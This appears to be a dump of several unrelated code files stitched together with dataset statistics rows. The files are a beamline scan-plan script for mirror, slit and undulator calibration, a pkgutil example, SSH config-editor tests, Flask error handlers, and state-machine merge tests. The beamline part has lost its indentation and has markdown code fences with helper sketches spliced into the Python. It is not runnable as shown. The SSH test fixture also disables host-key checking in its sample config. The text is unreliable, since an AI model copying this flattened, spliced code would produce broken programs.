step_m1pit= 25.33/4
yield from mv(extslt.vg,10)
yield from mv(extslt.hg,200)
yield from mv(epu1.gap,40.7) #detuned
for i in range(1, 7):
caput('XF:02IDA-OP{Mir:1-Ax:4_Pitch}Cmd:Kill-Cmd',1 )
yield from abs_set(m1.pit,mir1_pit_init+step_m1pit*(1*i+8),wait=False)
yield from sleep(30)
caput('XF:02IDA-OP{Mir:1-Ax:4_Pitch}Cmd:Kill-Cmd',1 )
yield from mv(m4.pit,mir4_pit_init+step_m4pit*(1*i+8))
yield from mv(m3.x,mir3_x_init+step_m3x*(1*i+8))
yield from mv(m3.pit,mir3_pit_init+step_m3pit*(1*i+8))
yield from mv(extslt.hc,extslt_hc_init+step_extslt_hc*(1*i+8))
yield from mv(cryo.x,29.2)
yield from mv(cryo.y,100.00)
yield from sleep(30)
yield from scan(d11,cryo.y,100.00,100.70,141)
yield from mv(cryo.y,99.0)
yield from mv(cryo.x,32.35)
yield from sleep(30)
yield from scan(d11,cryo.x,32.35,33.35,201)
def beam_profile_vs_m4_surface():
#Beam Profile with Si-blade aligned at the center of rotation of SC
# Optics Wheel should be at 50.9 deg to have the photodiode located behind the cryostat
d11 = [qem10,qem11]
m4slt_inb_init=10.5
m4slt_out_init=-1.95
step_x=0.1
yield from mv(extslt.vg,10)
yield from mv(epu1.gap,41.1) #tuned
for i in range(1, 24):
yield from mv(m4slt.inb,m4slt_inb_init+step_x*i)
yield from mv(m4slt.out,m4slt_out_init+step_x*i)
yield from sleep(10)
yield from mv(cryo.x,18.65)
yield from mv(cryo.y,99.0)
yield from sleep(30)
yield from scan(d11,cryo.y,99.0,99.5,151)
yield from mv(cryo.y,97.0)
yield from mv(cryo.x,21.3)
yield from sleep(30)
yield from scan(d11,cryo.x,21.3,23.3,401)
yield from mv(m4slt.inb,-18)
yield from mv(m4slt.out,18)
yield from sleep(30)
yield from mv(epu1.gap,40.7) #detuned
mir4_rol_init=2.093140 #m4_rol initial value 2.59314
step_r=0.1
for i in range(0, 11):
yield from mv(m4.rol,mir4_rol_init+step_r*i)
yield from sleep(10)
yield from mv(cryo.x,18.65)
yield from mv(cryo.y,97.9)
yield from sleep(10)
yield from scan(d11,cryo.y,97.9,99.9,401)
yield from mv(cryo.y,97.0)
yield from mv(cryo.x,21.3)
yield from sleep(10)
yield from scan(d11,cryo.x,21.3,23.3,401)
def beam_position_vs_m4_height_v():
#Beam Profile with Si-blade aligned at the center of rotation of SC
# Optics Wheel should be at 50.9 deg to have the photodiode located behind the cryostat
dets = [sclr]
m4slt_bot_init= -2.0
step_x = 0.2
yield from mv(m4slt.vg,0.25)
for i in range(0, 19):
yield from mv(m4slt.vc,m4slt_bot_init+step_x*i)
yield from sleep(10)
yield from scan(dets,cryo.y,90,90.1,301)
def beam_profile_vs_m4_surface_v():
#Beam Profile with Si-blade aligned at the center of rotation of SC
# Optics Wheel should be at 50.9 deg to have the photodiode located behind the cryostat
d11 = [qem10,qem11]
m4slt_bot_init= 4.7250
m4slt_top_init=-8.9750
step_x=0.08
yield from mv(extslt.vg,10)
yield from mv(epu1.gap,41.1) #tuned
for i in range(5, 11):
yield from mv(m4slt.bot,m4slt_bot_init+step_x*i)
yield from mv(m4slt.top,m4slt_top_init+step_x*i)
yield from sleep(10)
yield from mv(cryo.x,18.65)
yield from mv(cryo.y,97.90)
yield from sleep(30)
yield from scan(d11,cryo.y,97.9,99.9,401)
def FEscan_gap_new():
d = [qem07]
yield from mv(feslt.hc,0)
yield from mv(feslt.vc,0)
yield from mv(epu1.gap,41.3)
# Check Vertical Gap
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
for i in range(0, 14):
yield from mv(feslt.vg,1.5-0.1*i)
yield from mv(pgm.en,870)
yield from sleep(10)
yield from scan(d,pgm.en,870,970,100)
# Check Horizontal Gap
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
for i in range(0, 14):
yield from mv(feslt.hg,1.5-0.1*i)
yield from mv(pgm.en,870)
yield from sleep(10)
yield from scan(d,pgm.en,870,970,100)
# Repeat FE Slit Center Search
yield from mv(feslt.hg,0.8)
yield from mv(feslt.vg,0.8)
yield from mv(epu1.gap,41.3)
for i in range(0, 9):
yield from mv(feslt.vc,0.8-0.2*i)
for j in range(0, 9):
yield from mv(feslt.hc,0.8-0.2*j)
yield from mv(pgm.en,870)
yield from sleep(10)
yield from scan(d,pgm.en,870,970,100)
yield from mv(feslt.hc,0.5)
yield from mv(feslt.vc,0.738)
yield from mv(epu1.gap,41.3)
# Check Vertical Gap
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
for i in range(0, 14):
yield from mv(feslt.vg,1.5-0.1*i)
yield from mv(pgm.en,870)
yield from sleep(10)
yield from scan(d,pgm.en,870,970,100)
# Check Horizontal Gap
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
for i in range(0, 14):
yield from mv(feslt.hg,1.5-0.1*i)
yield from mv(pgm.en,870)
yield from sleep(10)
yield from scan(d,pgm.en,870,970,100)
def epu_calib_gs_phase_pm28p5_0mm_new():
d=[qem07]
#Using Gas Cell Grid as detector
yield from mv(gc_diag,-95.4)
#################
# Phase -28.5mm #
#################
yield from mv(epu1.phase, -28.5)
#FE slit H and V gap to 1.2 mm
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
yield from mv(pgm.cff,2.330)
#1st Harmonic at 320 eV
yield from mv(pgm.en,320,epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,30)
yield from mv(epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,50)
#1st Harmonic
for i in range(350,401,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i,epu1.gap,calc_gap-1.4-7.8 -(i-350)*0.0067)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,3,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-1)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,100)
for i in range(450,1351,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i,epu1.gap,calc_gap-3-7.8 -(i-350)*0.0067)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,6,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-1)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,100)
yield from sleep(100)
#3rd Harmonic
for i in range(1000,1601,50):
calc_gap=e2g(i/3)
yield from mv(pgm.en,i,epu1.gap,calc_gap-0.5-8-(i-1000)*0.0027)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-0.5)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1.0,75)
#################
# Phase 0.0 mm #
#################
yield from mv(epu1.phase, 0)
#FE slit H and V gap to 1.2 mm
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
yield from mv(pgm.cff,2.330)
#160 eV
yield from mv(pgm.en,160,epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,75)
yield from mv(pgm.en,160,epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,75)
for i in range(200,1351,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i,epu1.gap,calc_gap-3)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,6,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-1)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,100)
yield from sleep(100)
#600-1550 eV, 3rd harmonic
for i in range(600,1601,50):
calc_gap=e2g(i/3)
yield from mv(pgm.en,i,epu1.gap,calc_gap-2)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,4,40)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-0.5)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1.0,75)
#################
# Phase 28.5mm #
#################
yield from mv(epu1.phase, 28.5)
#FE slit H and V gap to 1.2 mm
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
yield from mv(pgm.cff,2.330)
#1st Harmonic at 320 eV
yield from mv(pgm.en,320,epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,30)
yield from mv(epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,50)
#1st Harmonic
for i in range(350,401,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i,epu1.gap,calc_gap-1.4-7.8 -(i-350)*0.0067)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,3,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-1)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,100)
for i in range(450,1351,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i,epu1.gap,calc_gap-3-7.8 -(i-350)*0.0067)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,6,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-1)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,100)
yield from sleep(100)
#3rd Harmonic
for i in range(1000,1601,50):
calc_gap=e2g(i/3)
yield from mv(pgm.en,i,epu1.gap,calc_gap-0.5-8-(i-1000)*0.0027)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-0.5)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1.0,75)
def epu_calib_gs_phase_0mm_Mar2018():
d=[qem07]
#Using Gas Cell Grid as detector
yield from mv(gc_diag,-95.4)
#################
# Phase 0.0 mm #
#################
yield from mv(epu1.phase, 0)
#FE slit H and V gap to 1.2 mm
yield from mv(feslt.hg,1.5)
yield from mv(feslt.vg,1.5)
yield from mv(pgm.cff,2.330)
#160 eV
yield from mv(pgm.en,160,epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,75)
yield from mv(pgm.en,160,epu1.gap,17.05)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1,75)
for i in range(200,1351,50):
calc_gap=e2g(i)
yield from mv(pgm.en,i,epu1.gap,calc_gap-3)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,6,30)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-1)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,2,100)
yield from sleep(100)
#600-1550 eV, 3rd harmonic
for i in range(600,1601,50):
calc_gap=e2g(i/3)
yield from mv(pgm.en,i,epu1.gap,calc_gap-2)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,4,40)
yield from mv(epu1.gap,peaks['max']['gc_diag_grid'][0]-0.5)
yield from sleep(10)
yield from relative_scan(d,epu1.gap,0,1.0,75)
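# Every calibration above seeds the gap search as e2g(E) minus a constant
# detune and a linear energy-dependent correction, e.g.
# calc_gap-3-7.8-(i-350)*0.0067. A sketch of that model with the lookup
# injected (detuned_gap is our name; the toy lambda is NOT the real e2g):

```python
def detuned_gap(energy_ev, e2g, const_offset, slope, e_ref):
    """First-guess gap: lookup value minus constant and linear detune terms."""
    return e2g(energy_ev) - const_offset - slope * (energy_ev - e_ref)

# toy linear lookup purely for illustration
gap = detuned_gap(450, lambda e: 0.01 * e, 3 + 7.8, 0.0067, 350)
print(gap)  # 4.5 - 10.8 - 0.67 = -6.97
```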
#def alignM3x():
# # get the exit slit positions to return to at the end
# vg_init = extslt.vg.user_setpoint.value
# hg_init = extslt.hg.user_setpoint.value
# hc_init = extslt.hc.user_setpoint.value
# print('Saving exit slit positions for later')
# # get things out of the way
# yield from m3diag.out
# # read gas cell diode
# yield from gcdiag.grid
# # set detector e.g. gas cell diagnostics qem
# detList=[qem07]
# # set V exit slit value to get enough signal
# yield from mv(extslt.vg, 30)
# # open H slit full open
# yield from mv(extslt.hg, 9000)
# #move extslt.hs appropriately and scan m3.x
# yield from mv(extslt.hc,-9)
# yield from relative_scan(detList,m3.x,-6,6,61)
# yield from mv(extslt.hc,-3)
# yield from relative_scan(detList,m3.x,-6,6,61)
# yield from mv(extslt.hc,3)
# yield from relative_scan(detList,m3.x,-6,6,61)
# print('Returning exit slit positions to the inital values')
# yield from mv(extslt.hc,hc_init)
# yield from mv(extslt.vg, vg_init, extslt.hg, hg_init)
def detectorz():
    yield from mv(rixscam.cam.acquire_time,480)
    yield from count([rixscam])
    f_string = ''
    for i in range(0,75,1):
        yield from mvr(dc.z,-5)
        yield from count([rixscam],md = {'reason':'carbon-tape dc_z scans'})
        x_val = db[-1].table('baseline')['dc_z'][1]
        f_string = 'scan no ' + str(db[-1].start['scan_id']) + ': dc_z = ' + str(x_val) + \
            ' , i = ' + str(i) + '\n'
        print(f_string)
    yield from mv(shutter_B,'Close')
    yield from count([rixscam])
    yield from count([rixscam],md = {'reason':'carbon-tape dc_z scans DARK'})
    yield from mv(dc.z, 260) # return to nominal value
def detectorvexit():
    yield from mv(rixscam.cam.acquire_time,600)
    yield from count([rixscam])
    f_string = ''
    for i in range(0,4,1):
        yield from mvr(extslt.vg,-10)
        yield from count([rixscam],md = {'reason':'carbon-tape extslt.vg scans'})
        x_val = db[-1].table('baseline')['extslt_vg'][1]
        f_string = 'scan no ' + str(db[-1].start['scan_id']) + ': extslt_vg = ' + str(x_val) + \
            ' , i = ' + str(i) + '\n'
        print(f_string)
    yield from mv(shutter_B,'Close')
    yield from count([rixscam])
    yield from count([rixscam],md = {'reason':'carbon-tape extslt_vg scans DARK'})
    yield from mv(extslt.vg, 50) # return to nominal value
def temp_eq(templimit=1,checktime=5):
    deltaT = stemp.temp.B.T.value - stemp.ctrl2.setpoint.value # for control; sample is temp.B.value
    i=0
    print('Temperature of cryostat equilibrating...\n')
    while (abs(deltaT)>templimit):
        sys.stdout.write('\r')
        sys.stdout.write("\tDeviation of %3.2f K to be within +/- %3.2f K after %d s." % (deltaT,templimit,checktime*i))
        sys.stdout.flush()
        i=i+1
        yield from sleep(checktime)
        deltaT = stemp.temp.B.T.value - stemp.ctrl2.setpoint.value  # re-read after the wait
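# temp_eq polls an EPICS delta until it is inside the tolerance band. The same
# logic with the reader and sleep injected, so it can be exercised without
# hardware (wait_for_equilibrium is our name, not part of the profile):

```python
def wait_for_equilibrium(read_delta, limit, sleep, max_checks=1000):
    """Block until abs(read_delta()) <= limit; return how often we waited."""
    checks = 0
    while abs(read_delta()) > limit:
        checks += 1
        if checks >= max_checks:
            raise TimeoutError('no equilibrium after %d checks' % checks)
        sleep()
    return checks

deltas = iter([5.0, 2.0, 0.5])
print(wait_for_equilibrium(lambda: next(deltas), limit=1, sleep=lambda: None))  # 2
```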
def beam_profile_vs_cryoz():
    for i in range(0, 31):
        yield from mv(cryo.z,0.1+i*0.1)
        yield from sleep(10)
        yield from rel_scan([sclr],cryo.y,0,0.08,51)
| 35.007642 | 186 | 0.572286 | 15,191 | 91,615 | 3.323942 | 0.054243 | 0.178595 | 0.123084 | 0.02331 | 0.861568 | 0.833564 | 0.804175 | 0.780073 | 0.759932 | 0.742524 | 0 | 0.079241 | 0.278895 | 91,615 | 2,616 | 187 | 35.021024 | 0.685078 | 0.18545 | 0 | 0.691471 | 0 | 0.005724 | 0.093658 | 0.001532 | 0.000572 | 0 | 0 | 0.001147 | 0 | 1 | 0.042358 | false | 0.001717 | 0.000572 | 0 | 0.042931 | 0.04751 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
5225e928e5c0b9f454e82869dae21549249f5c6c | 103 | py | Python | WEEKS/CD_Sata-Structures/_MISC/misc-examples/python3-book-examples/pkgutil/nested/shallow.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | WEEKS/CD_Sata-Structures/_MISC/misc-examples/python3-book-examples/pkgutil/nested/shallow.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | WEEKS/CD_Sata-Structures/_MISC/misc-examples/python3-book-examples/pkgutil/nested/shallow.py | webdevhub42/Lambda | b04b84fb5b82fe7c8b12680149e25ae0d27a0960 | [
"MIT"
] | null | null | null | #
"""
"""
def func():
print("This func() comes from the installed " "version of nested.shallow")
| 12.875 | 78 | 0.61165 | 13 | 103 | 4.846154 | 0.923077 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.203884 | 103 | 7 | 79 | 14.714286 | 0.768293 | 0 | 0 | 0 | 0 | 0 | 0.652632 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | true | 0 | 0 | 0 | 0.5 | 0.5 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
870cd64404771971552a20705cddc6ebb3ce3bf6 | 2,471 | py | Python | tests/test_ssh.py | codeghar/config_edit | b4ff42164d9fc011cb2d8466221f393112d89d90 | [
"MIT"
] | null | null | null | tests/test_ssh.py | codeghar/config_edit | b4ff42164d9fc011cb2d8466221f393112d89d90 | [
"MIT"
] | null | null | null | tests/test_ssh.py | codeghar/config_edit | b4ff42164d9fc011cb2d8466221f393112d89d90 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
test_ssh
----------------------------------
Tests for SSH config files.
"""
import filecmp
import tempfile
import pytest
from config_edit import ssh
contents = """# Comment Here
# -------------------------
Host myhost1
HostName 255.255.255.255
Port 22
User user-login
AddressFamily inet
# CheckHostIP no
# StrictHostKeyChecking no
# UserKnownHostsFile /dev/null
# More Comments
Host myhost2
HostName fd85::fa:11
Port 22
User user-login
AddressFamily inet6
CheckHostIP no
StrictHostKeyChecking no
UserKnownHostsFile /dev/null
"""
def test_ssh_client_config_single_write():
    with tempfile.NamedTemporaryFile(mode="w", delete=False) as fh_out:
        test_file = fh_out.name
        fh_out.write(contents)
    sshcfg = ssh.ClientConfig(file=test_file)
    sshcfg.read()
    sshcfg.write()
    for f in sshcfg.file_bkps:
        assert filecmp.cmp(f, test_file), "File backup {0} does not match contents {1}".format(f, test_file)


def test_ssh_client_config_multiple_writes():
    with tempfile.NamedTemporaryFile(mode="w", delete=False) as fh_out:
        test_file = fh_out.name
        fh_out.write(contents)
    sshcfg = ssh.ClientConfig(file=test_file)
    sshcfg.read()
    for _ in range(5):
        sshcfg.write()
    for f in sshcfg.file_bkps:
        assert filecmp.cmp(f, test_file), "File backup {0} does not match contents {1}".format(f, test_file)


def test_ssh_client_config_multiple_reads():
    with tempfile.NamedTemporaryFile(mode="w", delete=False) as fh_out:
        test_file = fh_out.name
        fh_out.write(contents)
    sshcfg = ssh.ClientConfig(file=test_file)
    for _ in range(5):
        sshcfg.read()
    sshcfg.write()
    for f in sshcfg.file_bkps:
        assert filecmp.cmp(f, test_file), "File backup {0} does not match contents {1}".format(f, test_file)


def test_ssh_client_config_multiple_reads_and_writes():
    with tempfile.NamedTemporaryFile(mode="w", delete=False) as fh_out:
        test_file = fh_out.name
        fh_out.write(contents)
    sshcfg = ssh.ClientConfig(file=test_file)
    for _ in range(5):
        sshcfg.read()
        sshcfg.write()
    for _ in range(5):
        sshcfg.read()
    for _ in range(5):
        sshcfg.write()
    for f in sshcfg.file_bkps:
        assert filecmp.cmp(f, test_file), "File backup {0} does not match contents {1}".format(f, test_file)
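The fixtures above depend on `tempfile.NamedTemporaryFile(delete=False)`: the temporary file survives the `with` block, so `ssh.ClientConfig` can reopen it by path, and every backup in `file_bkps` is expected to be byte-identical to the source. A minimal standalone sketch of that write-then-compare pattern, using only the standard library (the `.bkp` suffix here is an illustrative assumption, not necessarily what `file_bkps` actually produces):

```python
import filecmp
import os
import shutil
import tempfile

# delete=False keeps the file on disk after the handle closes,
# so other code can reopen it by path.
with tempfile.NamedTemporaryFile(mode="w", delete=False) as fh_out:
    test_file = fh_out.name
    fh_out.write("Host myhost\n")

backup = test_file + ".bkp"  # hypothetical backup naming
shutil.copyfile(test_file, backup)

# shallow=False forces a byte-by-byte comparison, not just a stat() check
same = filecmp.cmp(backup, test_file, shallow=False)

os.unlink(test_file)
os.unlink(backup)
```

Closing the handle before comparing matters on platforms (notably Windows) where an open `NamedTemporaryFile` cannot be reopened by a second reader.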
# app/main/errors.py (maxnovais/Flapy_Blog, Apache-2.0)
from flask import render_template
from . import main
@main.app_errorhandler(403)
def forbidden(e):
    return render_template('main/error/403.html')


@main.app_errorhandler(404)
def page_not_found(e):
    return render_template('main/error/404.html')


@main.app_errorhandler(500)
def internal_server_error(e):
    return render_template('main/error/500.html')
# Source/Generator/Tests/DescriptorsTests.py (tzijnge/FloHsm, MIT)
import unittest
from Descriptors import State, StateType, InternalTransition, InitialTransition,\
StateTransition, ChoiceTransition, Action, ActionType
from Descriptors import Guard, SimpleGuard, NotGuard, AndGuard, OrGuard, EntryExit
import Helpers
class DescriptorTests(Helpers.FloHsmTester):
    def test_cannot_merge_states_with_different_names(self) -> None:
        s1 = Helpers.TestState(name='S1')
        s2 = Helpers.TestState(name='S2')
        self.assertFalse(s1.merge(s2))

    def test_merge_states_with_same_name(self) -> None:
        s1 = Helpers.TestState(name='S1')
        s2 = Helpers.TestState(name='S1')
        self.assertTrue(s1.merge(s2))
        self.assertState(s1, name='S1')

    def test_merge_state_and_choice_pseudo_state_with_same_name(self) -> None:
        s1 = Helpers.TestState(name='S1')
        s2 = State(name='S1', lineno=0, state_type=StateType.CHOICE)
        self.assertTrue(s1.merge(s2))
        self.assertState(s1, name='S1', state_type=StateType.CHOICE)

    def test_merge_states_with_different_parents(self) -> None:
        s1_1 = Helpers.TestState(name='S1', parent='P1')
        s1_2 = Helpers.TestState(name='S1', parent='P2')
        self.assertFalse(s1_1.merge(s1_2))

        s1_1 = Helpers.TestState(name='S1', parent=None)
        s1_2 = Helpers.TestState(name='S1', parent='P2')
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', parent='P2')

        s1_1 = Helpers.TestState(name='S1', parent='P1')
        s1_2 = Helpers.TestState(name='S1', parent=None)
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', parent='P1')

    def test_merge_equal_entry_statements(self) -> None:
        s1_1 = Helpers.TestState(name='S1', entry=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
        s1_2 = Helpers.TestState(name='S1', entry=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
        self.assertFalse(s1_1.merge(s1_2))

    def test_merge_different_entry_statements(self) -> None:
        s1_1 = Helpers.TestState(name='S1', entry=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
        s1_2 = Helpers.TestState(name='S1', entry=EntryExit(action=Action('A2'), guard=Helpers.TestGuard('G2')))
        self.assertFalse(s1_1.merge(s1_2))

    def test_merge_entry(self) -> None:
        s1_1 = Helpers.TestState(name='S1', entry=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
        s1_2 = Helpers.TestState(name='S1')
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', entry_action=Action('A1'), entry_guard='G1')

        s1_1 = Helpers.TestState(name='S1')
        s1_2 = Helpers.TestState(name='S1', entry=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', entry_action=Action('A1'), entry_guard='G1')

    def test_merge_equal_exit_statements(self) -> None:
        s1_1 = Helpers.TestState(name='S1', exit=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
        s1_2 = Helpers.TestState(name='S1', exit=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
        self.assertFalse(s1_1.merge(s1_2))

    def test_merge_different_exit_statements(self) -> None:
        s1_1 = Helpers.TestState(name='S1', exit=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
        s1_2 = Helpers.TestState(name='S1', exit=EntryExit(action=Action('A2'), guard=Helpers.TestGuard('G2')))
        self.assertFalse(s1_1.merge(s1_2))

    def test_merge_exit(self) -> None:
        s1_1 = Helpers.TestState(name='S1', exit=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
        s1_2 = Helpers.TestState(name='S1')
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', exit_action=Action('A1'), exit_guard='G1')

        s1_1 = Helpers.TestState(name='S1')
        s1_2 = Helpers.TestState(name='S1', exit=EntryExit(action=Action('A1'), guard=Helpers.TestGuard('G1')))
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', exit_action=Action('A1'), exit_guard='G1')

    def test_merge_internal_transitions_with_empty_list(self) -> None:
        s1_1 = Helpers.TestState(name='S1', internal_transitions=[InternalTransition(event='E1', action=Action('A1'))])
        s1_2 = Helpers.TestState(name='S1')
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', num_int_transitions=1)
        self.assertInternalTransition(s1_1.internal_transitions[0], event='E1', action=Action('A1'))

        s1_1 = Helpers.TestState(name='S1')
        s1_2 = Helpers.TestState(name='S1', internal_transitions=[InternalTransition(event='E1', action=Action('A1'))])
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', num_int_transitions=1)
        self.assertInternalTransition(s1_1.internal_transitions[0], event='E1', action=Action('A1'))
    def test_merge_internal_transitions_from_two_states(self) -> None:
        s1_1 = Helpers.TestState(name='S1', internal_transitions=[InternalTransition(event='E1', action=Action('A1'))])
        s1_2 = Helpers.TestState(name='S1', internal_transitions=[InternalTransition(event='E1', action=Action('A1'))])
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', num_int_transitions=2)
        self.assertInternalTransition(s1_1.internal_transitions[0], event='E1', action=Action('A1'))
        self.assertInternalTransition(s1_1.internal_transitions[1], event='E1', action=Action('A1'))

        s1_1 = Helpers.TestState(name='S1', internal_transitions=[InternalTransition(event='E1', action=Action('A1'))])
        s1_2 = Helpers.TestState(name='S1', internal_transitions=[InternalTransition(event='E2', action=Action('A1'))])
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', num_int_transitions=2)
        self.assertInternalTransition(s1_1.internal_transitions[0], event='E1', action=Action('A1'))
        self.assertInternalTransition(s1_1.internal_transitions[1], event='E2', action=Action('A1'))

    def test_merge_state_transitions_with_empty_list(self) -> None:
        s1_1 = Helpers.TestState(name='S1', state_transitions=[StateTransition(toState='S2', event='E1')])
        s1_2 = Helpers.TestState(name='S1')
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', num_state_transitions=1)
        self.assertStateTransition(s1_1.state_transitions[0], to='S2', event='E1')

        s1_1 = Helpers.TestState(name='S1')
        s1_2 = Helpers.TestState(name='S1', state_transitions=[StateTransition(toState='S2', event='E1')])
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', num_state_transitions=1)
        self.assertStateTransition(s1_1.state_transitions[0], to='S2', event='E1')

    def test_merge_state_transitions_from_two_states(self) -> None:
        s1_1 = Helpers.TestState(name='S1', state_transitions=[StateTransition(toState='S2', event='E1')])
        s1_2 = Helpers.TestState(name='S1', state_transitions=[StateTransition(toState='S2', event='E1')])
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', num_state_transitions=2)
        self.assertStateTransition(s1_1.state_transitions[0], to='S2', event='E1')
        self.assertStateTransition(s1_1.state_transitions[1], to='S2', event='E1')

        s1_1 = Helpers.TestState(name='S1', state_transitions=[StateTransition(toState='S2', event='E1')])
        s1_2 = Helpers.TestState(name='S1', state_transitions=[StateTransition(toState='S3', event='E2')])
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', num_state_transitions=2)
        self.assertStateTransition(s1_1.state_transitions[0], to='S2', event='E1')
        self.assertStateTransition(s1_1.state_transitions[1], to='S3', event='E2')

    def test_merge_choice_transition(self) -> None:
        s1_1 = Helpers.TestState(name='Choice', choice_transitions=[ChoiceTransition('S2', Helpers.TestGuard('G1'))])
        s1_2 = Helpers.TestState(name='Choice', choice_transitions=[ChoiceTransition('S3', Helpers.TestGuard('G2'))])
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='Choice', num_choice_transitions=2)
        self.assertChoiceTransition(s1_1.choice_transitions[0], to='S2', guard='G1')
        self.assertChoiceTransition(s1_1.choice_transitions[1], to='S3', guard='G2')

    def test_merge_equal_composite_statements(self) -> None:
        s1_1 = Helpers.TestState(name='S1', is_composite=True)
        s1_2 = Helpers.TestState(name='S1', is_composite=True)
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', is_composite=True)

        s1_1 = Helpers.TestState(name='S1', is_composite=False)
        s1_2 = Helpers.TestState(name='S1', is_composite=False)
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', is_composite=False)

    def test_merge_different_composite_statements(self) -> None:
        s1_1 = Helpers.TestState(name='S1', is_composite=True)
        s1_2 = Helpers.TestState(name='S1', is_composite=False)
        self.assertTrue(s1_1.merge(s1_2))
        self.assertState(s1_1, name='S1', is_composite=True)

